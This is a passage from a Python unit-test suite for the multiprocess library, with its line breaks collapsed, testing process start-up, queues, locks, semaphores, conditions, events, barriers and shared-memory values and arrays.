2: for i in range(2): p = cls.Process( target=cls._test_recursion, args=(wconn, id+[i]) ) p.start() p.join() @unittest.skipIf(True, "fails with is_dill(obj, child=True)") def test_recursion(self): rconn, wconn = self.Pipe(duplex=False) self._test_recursion(wconn, []) time.sleep(DELTA) result = [] while rconn.poll(): result.append(rconn.recv()) expected = [ [], [0], [0, 0], [0, 1], [1], [1, 0], [1, 1] ] self.assertEqual(result, expected) @classmethod def _test_sentinel(cls, event): event.wait(10.0) def test_sentinel(self): if self.TYPE == "threads": self.skipTest('test not appropriate for {}'.format(self.TYPE)) event = self.Event() p = self.Process(target=self._test_sentinel, args=(event,)) with self.assertRaises(ValueError): p.sentinel p.start() self.addCleanup(p.join) sentinel = p.sentinel self.assertIsInstance(sentinel, int) self.assertFalse(wait_for_handle(sentinel, timeout=0.0)) event.set() p.join() self.assertTrue(wait_for_handle(sentinel, timeout=1)) def test_lose_target_ref(self): c = DummyCallable() wr = weakref.ref(c) q = self.Queue() p = self.Process(target=c, args=(q, c)) del c p.start() p.join() self.assertIs(wr(), None) self.assertEqual(q.get(), 5) close_queue(q) @classmethod def _test_error_on_stdio_flush(self, evt, break_std_streams={}): for stream_name, action in break_std_streams.items(): if action == 'close': stream = io.StringIO() stream.close() else: assert action == 'remove' stream = None setattr(sys, stream_name, None) evt.set() def test_error_on_stdio_flush_1(self): # Check that Process works with broken standard streams streams = [io.StringIO(), None] streams[0].close() for stream_name in ('stdout', 'stderr'): for stream in streams: old_stream = getattr(sys, stream_name) setattr(sys, stream_name, stream) try: evt = self.Event() proc = self.Process(target=self._test_error_on_stdio_flush, args=(evt,)) proc.start() proc.join() self.assertTrue(evt.is_set()) self.assertEqual(proc.exitcode, 0) finally: setattr(sys, stream_name, old_stream) def test_error_on_stdio_flush_2(self): # Same as test_error_on_stdio_flush_1(), but standard streams are # broken by the child process for stream_name in ('stdout', 'stderr'): for action in ('close', 'remove'): old_stream = getattr(sys, stream_name) try: evt = self.Event() proc = self.Process(target=self._test_error_on_stdio_flush, args=(evt, {stream_name: action})) proc.start() proc.join() self.assertTrue(evt.is_set()) self.assertEqual(proc.exitcode, 0) finally: setattr(sys, stream_name, old_stream) @classmethod def _sleep_and_set_event(self, evt, delay=0.0): time.sleep(delay) evt.set() def check_forkserver_death(self, signum): # bpo-31308: if the forkserver process has died, we should still # be able to create and run new Process instances (the forkserver # is implicitly restarted). if self.TYPE == 'threads': self.skipTest('test not appropriate for {}'.format(self.TYPE)) sm = multiprocess.get_start_method() if sm != 'forkserver': # The fork method by design inherits all fds from the parent, # trying to go against it is a lost battle self.skipTest('test not appropriate for {}'.format(sm)) from multiprocess.forkserver import _forkserver _forkserver.ensure_running() # First process sleeps 500 ms delay = 0.5 evt = self.Event() proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay)) proc.start() pid = _forkserver._forkserver_pid os.kill(pid, signum) # give time to the fork server to die and time to proc to complete time.sleep(delay * 2.0) evt2 = self.Event() proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,)) proc2.start() proc2.join() self.assertTrue(evt2.is_set()) self.assertEqual(proc2.exitcode, 0) proc.join() self.assertTrue(evt.is_set()) self.assertIn(proc.exitcode, (0, 255)) def test_forkserver_sigint(self): # Catchable signal self.check_forkserver_death(signal.SIGINT) def test_forkserver_sigkill(self): # Uncatchable signal if os.name != 'nt': self.check_forkserver_death(signal.SIGKILL) # # # class _UpperCaser(multiprocess.Process): def __init__(self): multiprocess.Process.__init__(self) self.child_conn, self.parent_conn = multiprocess.Pipe() def run(self): self.parent_conn.close() for s in iter(self.child_conn.recv, None): self.child_conn.send(s.upper()) self.child_conn.close() def submit(self, s): assert type(s) is str self.parent_conn.send(s) return self.parent_conn.recv() def stop(self): self.parent_conn.send(None) self.parent_conn.close() self.child_conn.close() class _TestSubclassingProcess(BaseTestCase): ALLOWED_TYPES = ('processes',) def test_subclassing(self): uppercaser = _UpperCaser() uppercaser.daemon = True uppercaser.start() self.assertEqual(uppercaser.submit('hello'), 'HELLO') self.assertEqual(uppercaser.submit('world'), 'WORLD') uppercaser.stop() uppercaser.join() def test_stderr_flush(self): # sys.stderr is flushed at process shutdown (issue #13812) if self.TYPE == "threads": self.skipTest('test not appropriate for {}'.format(self.TYPE)) testfn = support.TESTFN self.addCleanup(support.unlink, testfn) proc = self.Process(target=self._test_stderr_flush, args=(testfn,)) proc.start() proc.join() with open(testfn, 'r') as f: err = f.read() # The whole traceback was printed self.assertIn("ZeroDivisionError", err) self.assertIn("__init__.py", err) self.assertIn("1/0 # MARKER", err) @classmethod def _test_stderr_flush(cls, testfn): fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL) sys.stderr = open(fd, 'w', closefd=False) 1/0 # MARKER @classmethod def _test_sys_exit(cls, reason, testfn): fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL) sys.stderr = open(fd, 'w', closefd=False) sys.exit(reason) def test_sys_exit(self): # See Issue 13854 if self.TYPE == 'threads': self.skipTest('test not appropriate for {}'.format(self.TYPE)) testfn = support.TESTFN self.addCleanup(support.unlink, testfn) for reason in ( [1, 2, 3], 'ignore this', ): p = self.Process(target=self._test_sys_exit, args=(reason, testfn)) p.daemon = True p.start() p.join(5) self.assertEqual(p.exitcode, 1) with open(testfn, 'r') as f: content = f.read() self.assertEqual(content.rstrip(), str(reason)) os.unlink(testfn) for reason in (True, False, 8): p = self.Process(target=sys.exit, args=(reason,)) p.daemon = True p.start() p.join(5) self.assertEqual(p.exitcode, reason) # # # def queue_empty(q): if hasattr(q, 'empty'): return q.empty() else: return q.qsize() == 0 def queue_full(q, maxsize): if hasattr(q, 'full'): return q.full() else: return q.qsize() == maxsize class _TestQueue(BaseTestCase): @classmethod def _test_put(cls, queue, child_can_start, parent_can_continue): child_can_start.wait() for i in range(6): queue.get() parent_can_continue.set() def test_put(self): MAXSIZE = 6 queue = self.Queue(maxsize=MAXSIZE) child_can_start = self.Event() parent_can_continue = self.Event() proc = self.Process( target=self._test_put, args=(queue, child_can_start, parent_can_continue) ) proc.daemon = True proc.start() self.assertEqual(queue_empty(queue), True) self.assertEqual(queue_full(queue, MAXSIZE), False) queue.put(1) queue.put(2, True) queue.put(3, True, None) queue.put(4, False) queue.put(5, False, None) queue.put_nowait(6) # the values may be in buffer but not yet in pipe so sleep a bit time.sleep(DELTA) self.assertEqual(queue_empty(queue), False) self.assertEqual(queue_full(queue, MAXSIZE), True) put = TimingWrapper(queue.put) put_nowait = TimingWrapper(queue.put_nowait) self.assertRaises(pyqueue.Full, put, 7, False) self.assertTimingAlmostEqual(put.elapsed, 0) self.assertRaises(pyqueue.Full, put, 7, False, None) self.assertTimingAlmostEqual(put.elapsed, 0) self.assertRaises(pyqueue.Full, put_nowait, 7) self.assertTimingAlmostEqual(put_nowait.elapsed, 0) self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1) self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1) self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2) self.assertTimingAlmostEqual(put.elapsed, 0) self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3) self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3) child_can_start.set() parent_can_continue.wait() self.assertEqual(queue_empty(queue), True) self.assertEqual(queue_full(queue, MAXSIZE), False) proc.join() close_queue(queue) @classmethod def _test_get(cls, queue, child_can_start, parent_can_continue): child_can_start.wait() #queue.put(1) queue.put(2) queue.put(3) queue.put(4) queue.put(5) parent_can_continue.set() def test_get(self): queue = self.Queue() child_can_start = self.Event() parent_can_continue = self.Event() proc = self.Process( target=self._test_get, args=(queue, child_can_start, parent_can_continue) ) proc.daemon = True proc.start() self.assertEqual(queue_empty(queue), True) child_can_start.set() parent_can_continue.wait() time.sleep(DELTA) self.assertEqual(queue_empty(queue), False) # Hangs unexpectedly, remove for now #self.assertEqual(queue.get(), 1) self.assertEqual(queue.get(True, None), 2) self.assertEqual(queue.get(True), 3) self.assertEqual(queue.get(timeout=1), 4) self.assertEqual(queue.get_nowait(), 5) self.assertEqual(queue_empty(queue), True) get = TimingWrapper(queue.get) get_nowait = TimingWrapper(queue.get_nowait) self.assertRaises(pyqueue.Empty, get, False) self.assertTimingAlmostEqual(get.elapsed, 0) self.assertRaises(pyqueue.Empty, get, False, None) self.assertTimingAlmostEqual(get.elapsed, 0) self.assertRaises(pyqueue.Empty, get_nowait) self.assertTimingAlmostEqual(get_nowait.elapsed, 0) self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1) self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2) self.assertTimingAlmostEqual(get.elapsed, 0) self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3) self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3) proc.join() close_queue(queue) @classmethod def _test_fork(cls, queue): for i in range(10, 20): queue.put(i) # note that at this point the items may only be buffered, so the # process cannot shutdown until the feeder thread has finished # pushing items onto the pipe. def test_fork(self): # Old versions of Queue would fail to create a new feeder # thread for a forked process if the original process had its # own feeder thread. This test checks that this no longer # happens. queue = self.Queue() # put items on queue so that main process starts a feeder thread for i in range(10): queue.put(i) # wait to make sure thread starts before we fork a new process time.sleep(DELTA) # fork process p = self.Process(target=self._test_fork, args=(queue,)) p.daemon = True p.start() # check that all expected items are in the queue for i in range(20): self.assertEqual(queue.get(), i) self.assertRaises(pyqueue.Empty, queue.get, False) p.join() close_queue(queue) def test_qsize(self): q = self.Queue() try: self.assertEqual(q.qsize(), 0) except NotImplementedError: self.skipTest('qsize method not implemented') q.put(1) self.assertEqual(q.qsize(), 1) q.put(5) self.assertEqual(q.qsize(), 2) q.get() self.assertEqual(q.qsize(), 1) q.get() self.assertEqual(q.qsize(), 0) close_queue(q) @classmethod def _test_task_done(cls, q): for obj in iter(q.get, None): time.sleep(DELTA) q.task_done() def test_task_done(self): queue = self.JoinableQueue() workers = [self.Process(target=self._test_task_done, args=(queue,)) for i in range(4)] for p in workers: p.daemon = True p.start() for i in range(10): queue.put(i) queue.join() for p in workers: queue.put(None) for p in workers: p.join() close_queue(queue) def test_no_import_lock_contention(self): with support.temp_cwd(): module_name = 'imported_by_an_imported_module' with open(module_name + '.py', 'w') as f: f.write("""if 1: import multiprocess as multiprocessing q = multiprocessing.Queue() q.put('knock knock') q.get(timeout=3) q.close() del q """) with support.DirsOnSysPath(os.getcwd()): try: __import__(module_name) except pyqueue.Empty: self.fail("Probable regression on import lock contention;" " see Issue #22853") def test_timeout(self): q = multiprocess.Queue() start = time.time() self.assertRaises(pyqueue.Empty, q.get, True, 0.200) delta = time.time() - start # bpo-30317: Tolerate a delta of 100 ms because of the bad clock # resolution on Windows (usually 15.6 ms). x86 Windows7 3.x once # failed because the delta was only 135.8 ms. self.assertGreaterEqual(delta, 0.100) close_queue(q) def test_queue_feeder_donot_stop_onexc(self): # bpo-30414: verify feeder handles exceptions correctly if self.TYPE != 'processes': self.skipTest('test not appropriate for {}'.format(self.TYPE)) class NotSerializable(object): def __reduce__(self): raise AttributeError with support.captured_stderr(): q = self.Queue() q.put(NotSerializable()) q.put(True) # bpo-30595: use a timeout of 1 second for slow buildbots self.assertTrue(q.get(timeout=1.0)) close_queue(q) # # # class _TestLock(BaseTestCase): def test_lock(self): lock = self.Lock() self.assertEqual(lock.acquire(), True) self.assertEqual(lock.acquire(False), False) self.assertEqual(lock.release(), None) self.assertRaises((ValueError, threading.ThreadError), lock.release) def test_rlock(self): lock = self.RLock() self.assertEqual(lock.acquire(), True) self.assertEqual(lock.acquire(), True) self.assertEqual(lock.acquire(), True) self.assertEqual(lock.release(), None) self.assertEqual(lock.release(), None) self.assertEqual(lock.release(), None) self.assertRaises((AssertionError, RuntimeError), lock.release) def test_lock_context(self): with self.Lock(): pass class _TestSemaphore(BaseTestCase): def _test_semaphore(self, sem): self.assertReturnsIfImplemented(2, get_value, sem) self.assertEqual(sem.acquire(), True) self.assertReturnsIfImplemented(1, get_value, sem) self.assertEqual(sem.acquire(), True) self.assertReturnsIfImplemented(0, get_value, sem) self.assertEqual(sem.acquire(False), False) self.assertReturnsIfImplemented(0, get_value, sem) self.assertEqual(sem.release(), None) self.assertReturnsIfImplemented(1, get_value, sem) self.assertEqual(sem.release(), None) self.assertReturnsIfImplemented(2, get_value, sem) def test_semaphore(self): sem = self.Semaphore(2) self._test_semaphore(sem) self.assertEqual(sem.release(), None) self.assertReturnsIfImplemented(3, get_value, sem) self.assertEqual(sem.release(), None) self.assertReturnsIfImplemented(4, get_value, sem) def test_bounded_semaphore(self): sem = self.BoundedSemaphore(2) self._test_semaphore(sem) # Currently fails on OS/X #if HAVE_GETVALUE: # self.assertRaises(ValueError, sem.release) # self.assertReturnsIfImplemented(2, get_value, sem) def test_timeout(self): if self.TYPE != 'processes': self.skipTest('test not appropriate for {}'.format(self.TYPE)) sem = self.Semaphore(0) acquire = TimingWrapper(sem.acquire) self.assertEqual(acquire(False), False) self.assertTimingAlmostEqual(acquire.elapsed, 0.0) self.assertEqual(acquire(False, None), False) self.assertTimingAlmostEqual(acquire.elapsed, 0.0) self.assertEqual(acquire(False, TIMEOUT1), False) self.assertTimingAlmostEqual(acquire.elapsed, 0) self.assertEqual(acquire(True, TIMEOUT2), False) self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2) self.assertEqual(acquire(timeout=TIMEOUT3), False) self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3) class _TestCondition(BaseTestCase): @classmethod def f(cls, cond, sleeping, woken, timeout=None): cond.acquire() sleeping.release() cond.wait(timeout) woken.release() cond.release() def check_invariant(self, cond): # this is only supposed to succeed when there are no sleepers if self.TYPE == 'processes': try: sleepers = (cond._sleeping_count.get_value() - cond._woken_count.get_value()) self.assertEqual(sleepers, 0) self.assertEqual(cond._wait_semaphore.get_value(), 0) except NotImplementedError: pass def test_notify(self): cond = self.Condition() sleeping = self.Semaphore(0) woken = self.Semaphore(0) p = self.Process(target=self.f, args=(cond, sleeping, woken)) p.daemon = True p.start() self.addCleanup(p.join) p = threading.Thread(target=self.f, args=(cond, sleeping, woken)) p.daemon = True p.start() self.addCleanup(p.join) # wait for both children to start sleeping sleeping.acquire() sleeping.acquire() # check no process/thread has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(0, get_value, woken) # wake up one process/thread cond.acquire() cond.notify() cond.release() # check one process/thread has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(1, get_value, woken) # wake up another cond.acquire() cond.notify() cond.release() # check other has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(2, get_value, woken) # check state is not mucked up self.check_invariant(cond) p.join() def test_notify_all(self): cond = self.Condition() sleeping = self.Semaphore(0) woken = self.Semaphore(0) # start some threads/processes which will timeout for i in range(3): p = self.Process(target=self.f, args=(cond, sleeping, woken, TIMEOUT1)) p.daemon = True p.start() self.addCleanup(p.join) t = threading.Thread(target=self.f, args=(cond, sleeping, woken, TIMEOUT1)) t.daemon = True t.start() self.addCleanup(t.join) # wait for them all to sleep for i in range(6): sleeping.acquire() # check they have all timed out for i in range(6): woken.acquire() self.assertReturnsIfImplemented(0, get_value, woken) # check state is not mucked up self.check_invariant(cond) # start some more threads/processes for i in range(3): p = self.Process(target=self.f, args=(cond, sleeping, woken)) p.daemon = True p.start() self.addCleanup(p.join) t = threading.Thread(target=self.f, args=(cond, sleeping, woken)) t.daemon = True t.start() self.addCleanup(t.join) # wait for them to all sleep for i in range(6): sleeping.acquire() # check no process/thread has woken up time.sleep(DELTA) self.assertReturnsIfImplemented(0, get_value, woken) # wake them all up cond.acquire() cond.notify_all() cond.release() # check they have all woken for i in range(10): try: if get_value(woken) == 6: break except NotImplementedError: break time.sleep(DELTA) self.assertReturnsIfImplemented(6, get_value, woken) # check state is not mucked up self.check_invariant(cond) def test_timeout(self): cond = self.Condition() wait = TimingWrapper(cond.wait) cond.acquire() res = wait(TIMEOUT1) cond.release() self.assertEqual(res, False) self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1) @classmethod def _test_waitfor_f(cls, cond, state): with cond: state.value = 0 cond.notify() result = cond.wait_for(lambda : state.value==4) if not result or state.value != 4: sys.exit(1) @unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes') def test_waitfor(self): # based on test in test/lock_tests.py cond = self.Condition() state = self.Value('i', -1) p = self.Process(target=self._test_waitfor_f, args=(cond, state)) p.daemon = True p.start() with cond: result = cond.wait_for(lambda : state.value==0) self.assertTrue(result) self.assertEqual(state.value, 0) for i in range(4): time.sleep(0.01) with cond: state.value += 1 cond.notify() p.join(5) self.assertFalse(p.is_alive()) self.assertEqual(p.exitcode, 0) @classmethod def _test_waitfor_timeout_f(cls, cond, state, success, sem): sem.release() with cond: expected = 0.1 dt = time.time() result = cond.wait_for(lambda : state.value==4, timeout=expected) dt = time.time() - dt # borrow logic in assertTimeout() from test/lock_tests.py if not result and expected * 0.6 < dt < expected * 10.0: success.value = True @unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes') def test_waitfor_timeout(self): # based on test in test/lock_tests.py cond = self.Condition() state = self.Value('i', 0) success = self.Value('i', False) sem = self.Semaphore(0) p = self.Process(target=self._test_waitfor_timeout_f, args=(cond, state, success, sem)) p.daemon = True p.start() self.assertTrue(sem.acquire(timeout=10)) # Only increment 3 times, so state == 4 is never reached. for i in range(3): time.sleep(0.01) with cond: state.value += 1 cond.notify() p.join(5) self.assertTrue(success.value) @classmethod def _test_wait_result(cls, c, pid): with c: c.notify() time.sleep(1) if pid is not None: os.kill(pid, signal.SIGINT) def test_wait_result(self): if isinstance(self, ProcessesMixin) and sys.platform != 'win32': pid = os.getpid() else: pid = None c = self.Condition() with c: self.assertFalse(c.wait(0)) self.assertFalse(c.wait(0.1)) p = self.Process(target=self._test_wait_result, args=(c, pid)) p.start() self.assertTrue(c.wait(60)) if pid is not None: self.assertRaises(KeyboardInterrupt, c.wait, 60) p.join() class _TestEvent(BaseTestCase): @classmethod def _test_event(cls, event): time.sleep(TIMEOUT2) event.set() def test_event(self): event = self.Event() wait = TimingWrapper(event.wait) # Removed temporarily, due to API shear, this does not # work with threading._Event objects. is_set == isSet self.assertEqual(event.is_set(), False) # Removed, threading.Event.wait() will return the value of the __flag # instead of None. API Shear with the semaphore backed mp.Event self.assertEqual(wait(0.0), False) self.assertTimingAlmostEqual(wait.elapsed, 0.0) self.assertEqual(wait(TIMEOUT1), False) self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1) event.set() # See note above on the API differences self.assertEqual(event.is_set(), True) self.assertEqual(wait(), True) self.assertTimingAlmostEqual(wait.elapsed, 0.0) self.assertEqual(wait(TIMEOUT1), True) self.assertTimingAlmostEqual(wait.elapsed, 0.0) # self.assertEqual(event.is_set(), True) event.clear() #self.assertEqual(event.is_set(), False) p = self.Process(target=self._test_event, args=(event,)) p.daemon = True p.start() self.assertEqual(wait(), True) p.join() # # Tests for Barrier - adapted from tests in test/lock_tests.py # # Many of the tests for threading.Barrier use a list as an atomic # counter: a value is appended to increment the counter, and the # length of the list gives the value. We use the class DummyList # for the same purpose. class _DummyList(object): def __init__(self): wrapper = multiprocess.heap.BufferWrapper(struct.calcsize('i')) lock = multiprocess.Lock() self.__setstate__((wrapper, lock)) self._lengthbuf[0] = 0 def __setstate__(self, state): (self._wrapper, self._lock) = state self._lengthbuf = self._wrapper.create_memoryview().cast('i') def __getstate__(self): return (self._wrapper, self._lock) def append(self, _): with self._lock: self._lengthbuf[0] += 1 def __len__(self): with self._lock: return self._lengthbuf[0] def _wait(): # A crude wait/yield function not relying on synchronization primitives. time.sleep(0.01) class Bunch(object): """ A bunch of threads. """ def __init__(self, namespace, f, args, n, wait_before_exit=False): """ Construct a bunch of `n` threads running the same function `f`. If `wait_before_exit` is True, the threads won't terminate until do_finish() is called. """ self.f = f self.args = args self.n = n self.started = namespace.DummyList() self.finished = namespace.DummyList() self._can_exit = namespace.Event() if not wait_before_exit: self._can_exit.set() threads = [] for i in range(n): p = namespace.Process(target=self.task) p.daemon = True p.start() threads.append(p) def finalize(threads): for p in threads: p.join() self._finalizer = weakref.finalize(self, finalize, threads) def task(self): pid = os.getpid() self.started.append(pid) try: self.f(*self.args) finally: self.finished.append(pid) self._can_exit.wait(30) assert self._can_exit.is_set() def wait_for_started(self): while len(self.started) < self.n: _wait() def wait_for_finished(self): while len(self.finished) < self.n: _wait() def do_finish(self): self._can_exit.set() def close(self): self._finalizer() class AppendTrue(object): def __init__(self, obj): self.obj = obj def __call__(self): self.obj.append(True) class _TestBarrier(BaseTestCase): """ Tests for Barrier objects. """ N = 5 defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout def setUp(self): self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout) def tearDown(self): self.barrier.abort() self.barrier = None def DummyList(self): if self.TYPE == 'threads': return [] elif self.TYPE == 'manager': return self.manager.list() else: return _DummyList() def run_threads(self, f, args): b = Bunch(self, f, args, self.N-1) try: f(*args) b.wait_for_finished() finally: b.close() @classmethod def multipass(cls, barrier, results, n): m = barrier.parties assert m == cls.N for i in range(n): results[0].append(True) assert len(results[1]) == i * m barrier.wait() results[1].append(True) assert len(results[0]) == (i + 1) * m barrier.wait() try: assert barrier.n_waiting == 0 except NotImplementedError: pass assert not barrier.broken def test_barrier(self, passes=1): """ Test that a barrier is passed in lockstep """ results = [self.DummyList(), self.DummyList()] self.run_threads(self.multipass, (self.barrier, results, passes)) def test_barrier_10(self): """ Test that a barrier works for 10 consecutive runs """ return self.test_barrier(10) @classmethod def _test_wait_return_f(cls, barrier, queue): res = barrier.wait() queue.put(res) def test_wait_return(self): """ test the return value from barrier.wait """ queue = self.Queue() self.run_threads(self._test_wait_return_f, (self.barrier, queue)) results = [queue.get() for i in range(self.N)] self.assertEqual(results.count(0), 1) close_queue(queue) @classmethod def _test_action_f(cls, barrier, results): barrier.wait() if len(results) != 1: raise RuntimeError def test_action(self): """ Test the 'action' callback """ results = self.DummyList() barrier = self.Barrier(self.N, action=AppendTrue(results)) self.run_threads(self._test_action_f, (barrier, results)) self.assertEqual(len(results), 1) @classmethod def _test_abort_f(cls, barrier, results1, results2): try: i = barrier.wait() if i == cls.N//2: raise RuntimeError barrier.wait() results1.append(True) except threading.BrokenBarrierError: results2.append(True) except RuntimeError: barrier.abort() def test_abort(self): """ Test that an abort will put the barrier in a broken state """ results1 = self.DummyList() results2 = self.DummyList() self.run_threads(self._test_abort_f, (self.barrier, results1, results2)) self.assertEqual(len(results1), 0) self.assertEqual(len(results2), self.N-1) self.assertTrue(self.barrier.broken) @classmethod def _test_reset_f(cls, barrier, results1, results2, results3): i = barrier.wait() if i == cls.N//2: # Wait until the other threads are all in the barrier. while barrier.n_waiting < cls.N-1: time.sleep(0.001) barrier.reset() else: try: barrier.wait() results1.append(True) except threading.BrokenBarrierError: results2.append(True) # Now, pass the barrier again barrier.wait() results3.append(True) def test_reset(self): """ Test that a 'reset' on a barrier frees the waiting threads """ results1 = self.DummyList() results2 = self.DummyList() results3 = self.DummyList() self.run_threads(self._test_reset_f, (self.barrier, results1, results2, results3)) self.assertEqual(len(results1), 0) self.assertEqual(len(results2), self.N-1) self.assertEqual(len(results3), self.N) @classmethod def _test_abort_and_reset_f(cls, barrier, barrier2, results1, results2, results3): try: i = barrier.wait() if i == cls.N//2: raise RuntimeError barrier.wait() results1.append(True) except threading.BrokenBarrierError: results2.append(True) except RuntimeError: barrier.abort() # Synchronize and reset the barrier. Must synchronize first so # that everyone has left it when we reset, and after so that no # one enters it before the reset. if barrier2.wait() == cls.N//2: barrier.reset() barrier2.wait() barrier.wait() results3.append(True) def test_abort_and_reset(self): """ Test that a barrier can be reset after being broken. """ results1 = self.DummyList() results2 = self.DummyList() results3 = self.DummyList() barrier2 = self.Barrier(self.N) self.run_threads(self._test_abort_and_reset_f, (self.barrier, barrier2, results1, results2, results3)) self.assertEqual(len(results1), 0) self.assertEqual(len(results2), self.N-1) self.assertEqual(len(results3), self.N) @classmethod def _test_timeout_f(cls, barrier, results): i = barrier.wait() if i == cls.N//2: # One thread is late! time.sleep(1.0) try: barrier.wait(0.5) except threading.BrokenBarrierError: results.append(True) def test_timeout(self): """ Test wait(timeout) """ results = self.DummyList() self.run_threads(self._test_timeout_f, (self.barrier, results)) self.assertEqual(len(results), self.barrier.parties) @classmethod def _test_default_timeout_f(cls, barrier, results): i = barrier.wait(cls.defaultTimeout) if i == cls.N//2: # One thread is later than the default timeout time.sleep(1.0) try: barrier.wait() except threading.BrokenBarrierError: results.append(True) def test_default_timeout(self): """ Test the barrier's default timeout """ barrier = self.Barrier(self.N, timeout=0.5) results = self.DummyList() self.run_threads(self._test_default_timeout_f, (barrier, results)) self.assertEqual(len(results), barrier.parties) def test_single_thread(self): b = self.Barrier(1) b.wait() b.wait() @classmethod def _test_thousand_f(cls, barrier, passes, conn, lock): for i in range(passes): barrier.wait() with lock: conn.send(i) def test_thousand(self): if self.TYPE == 'manager': self.skipTest('test not appropriate for {}'.format(self.TYPE)) passes = 1000 lock = self.Lock() conn, child_conn = self.Pipe(False) for j in range(self.N): p = self.Process(target=self._test_thousand_f, args=(self.barrier, passes, child_conn, lock)) p.start() self.addCleanup(p.join) for i in range(passes): for j in range(self.N): self.assertEqual(conn.recv(), i) # # # class _TestValue(BaseTestCase): ALLOWED_TYPES = ('processes',) codes_values = [ ('i', 4343, 24234), ('d', 3.625, -4.25), ('h', -232, 234), ('c', latin('x'), latin('y')) ] def setUp(self): if not HAS_SHAREDCTYPES: self.skipTest("requires multiprocess.sharedctypes") @classmethod def _test(cls, values): for sv, cv in zip(values, cls.codes_values): sv.value = cv[2] def test_value(self, raw=False): if raw: values = [self.RawValue(code, value) for code, value, _ in self.codes_values] else: values = [self.Value(code, value) for code, value, _ in self.codes_values] for sv, cv in zip(values, self.codes_values): self.assertEqual(sv.value, cv[1]) proc = self.Process(target=self._test, args=(values,)) proc.daemon = True proc.start() proc.join() for sv, cv in zip(values, self.codes_values): self.assertEqual(sv.value, cv[2]) def test_rawvalue(self): self.test_value(raw=True) def test_getobj_getlock(self): val1 = self.Value('i', 5) lock1 = val1.get_lock() obj1 = val1.get_obj() val2 = self.Value('i', 5, lock=None) lock2 = val2.get_lock() obj2 = val2.get_obj() lock = self.Lock() val3 = self.Value('i', 5, lock=lock) lock3 = val3.get_lock() obj3 = val3.get_obj() self.assertEqual(lock, lock3) arr4 = self.Value('i', 5, lock=False) self.assertFalse(hasattr(arr4, 'get_lock')) self.assertFalse(hasattr(arr4, 'get_obj')) self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue') arr5 = self.RawValue('i', 5) self.assertFalse(hasattr(arr5, 'get_lock')) self.assertFalse(hasattr(arr5, 'get_obj')) class _TestArray(BaseTestCase): ALLOWED_TYPES = ('processes',) @classmethod def f(cls, seq): for i in range(1, len(seq)): seq[i] += seq[i-1] @unittest.skipIf(c_int is None, "requires _ctypes") def test_array(self, raw=False): seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831] if raw: arr = self.RawArray('i', seq) else: arr = self.Array('i', seq) self.assertEqual(len(arr), len(seq)) self.assertEqual(arr[3], seq[3]) self.assertEqual(list(arr[2:7]), list(seq[2:7])) arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4]) self.assertEqual(list(arr[:]), seq) self.f(seq) p = self.Process(target=self.f, args=(arr,)) p.daemon = True p.start() p.join() self.assertEqual(list(arr[:]), seq) @unittest.skipIf(c_int is None, "requires _ctypes") def test_array_from_size(self): size = 10 # Test for zeroing (see issue #11675). # The repetition below strengthens the test by increasing the chances # of previously allocated non-zero memory being used for the new array # on the 2nd and 3rd loops. for _ in range(3): arr = self.Array('i', size) self.assertEqual(len(arr), size) self.assertEqual(list(arr), [0] * size) arr[:] = range(10) self.assertEqual(list(arr), list(range(10))) del arr @unittest.skipIf(c_int is None, "requires _ctypes") def test_rawarray(self): self.test_array(raw=True) @unittest.skipIf(c_int is None, "requires _ctypes") def test_getobj_getlock_obj(self): arr1 = self.Array('i', list(range(10))) lock1 = arr1.get_lock() obj1 = arr1.get_obj() arr2 = self.Array('i', list(range(10)), lock=None) lock2 = arr2.get_lock() obj2 = arr2.get_obj() lock = self.Lock() arr3 = self.Array('i', list(range(10)), lock=lock) lock3 = arr3.get_lock() obj3 = arr3.get_obj() self.assertEqual(lock, lock3) arr4 = self.Array('i', range(10), lock=False) self.assertFalse(hasattr(arr4, 'get_lock')) self.assertFalse(hasattr(arr4, 'get_obj')) self.assertRaises(AttributeError, self.Array, 'i', range(10), lock='notalock') arr5 = self.RawArray('i', range(10)) self.assertFalse(hasattr(arr5, 'get_lock')) self.assertFalse(hasattr(arr5, 'get_obj')) # # # class _TestContainers(BaseTestCase): ALLOWED_TYPES = ('manager',) def test_list(self): a = self.list(list(range(10))) self.assertEqual(a[:], list(range(10))) b = self.list() self.assertEqual(b[:], []) b.extend(list(range(5))) self.assertEqual(b[:], list(range(5))) self.assertEqual(b[2], 2) self.assertEqual(b[2:10], [2,3,4]) b *= 2 self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]) self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6]) self.assertEqual(a[:], list(range(10))) d = [a, b] e = self.list(d) self.assertEqual( [element[:] for element in e], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]] ) f = self.list([a]) a.append('hello') self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']) def test_list_iter(self): a = self.list(list(range(10))) it = iter(a) 